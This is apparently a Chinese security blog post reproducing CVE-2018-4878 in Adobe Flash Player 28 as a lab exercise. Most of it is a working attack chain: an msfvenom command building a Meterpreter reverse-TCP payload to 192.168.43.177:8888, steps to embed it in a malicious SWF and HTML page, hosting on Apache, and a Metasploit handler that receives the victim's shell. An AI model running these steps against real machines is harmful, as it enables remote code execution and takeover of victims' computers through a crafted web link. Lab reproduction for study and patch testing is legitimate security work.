[漏洞复现]Adobe flash player 28(CVE-2018-4878)

攻击者通过构造特殊的 Flash 链接, 当用户用浏览器/邮件/Office 访问此Flash 链接时, 会被“远程代码执行”, 并且直接被 getshell。

环境:

实验步骤

一、kali 使用 msfvenom 生成 shell 代码

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.177 lport=8888 -f python>shellcode.txt

msfvenom的用法可参考 https://www.jianshu.com/p/dee2b171a0a0
下面是使用msfvenom的部分参数,是比较常用的

-p 选择一个payload
-l 载荷列表
-f 生成的文件格式
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
-x 允许我们指定一个自定义的可执行文件作为模板,也就是将木马捆绑到这个可执行文件上。
-h 帮助。

二、生成swf和html

git clone  https://github.com/HuanWoWeiLan/SoftwareSystemSecurity-2019.git

使用上面生成的payload替换cve-2018-4878.py中的payload

image.png

更改输出文件路径

更改输出文件的路径

执行cve-2018-4878.py,会生成两个文件

python cve-2018-4878.py
生成的文件

开启apache,将生成的两个文件拷贝到/var/www/html中

service apache2 start
cp index2.html /var/www/html/index2.html
cp exploit.swf /var/www/html/exploit.swf

kali开启监听

#msfconsole启动
msfconsole
#使用handler监听模块  
msf > use exploit/multi/handler 
#回弹一个tcp连接  
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp 
#设置kali渗透机的ip地址  
msf exploit(handler) > set lhost 192.168.43.177
#设置监听端口,这个需跟上面msfvenom设置的端口一致  
msf exploit(handler) > set lport 8888 
#开启监听,等待靶机上线 
msf exploit(handler) > exploit
开启监听

靶机安装adobe flash player

image.png

访问 http://192.168.43.177/index2.html
image.png

kali getshell成功
image.png

meterpreter用法可参考 https://www.cnblogs.com/backlion/p/9484949.html

参考资料

https://blog.51cto.com/chenxinjie/2093653https://github.com/HuanWoWeiLan/SoftwareSystemSecurity-2019/blob/master/%E5%AE%9E%E9%AA%8C%E6%8A%A5%E5%91%8A.mdhttps://www.cnblogs.com/backlion/p/9484949.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值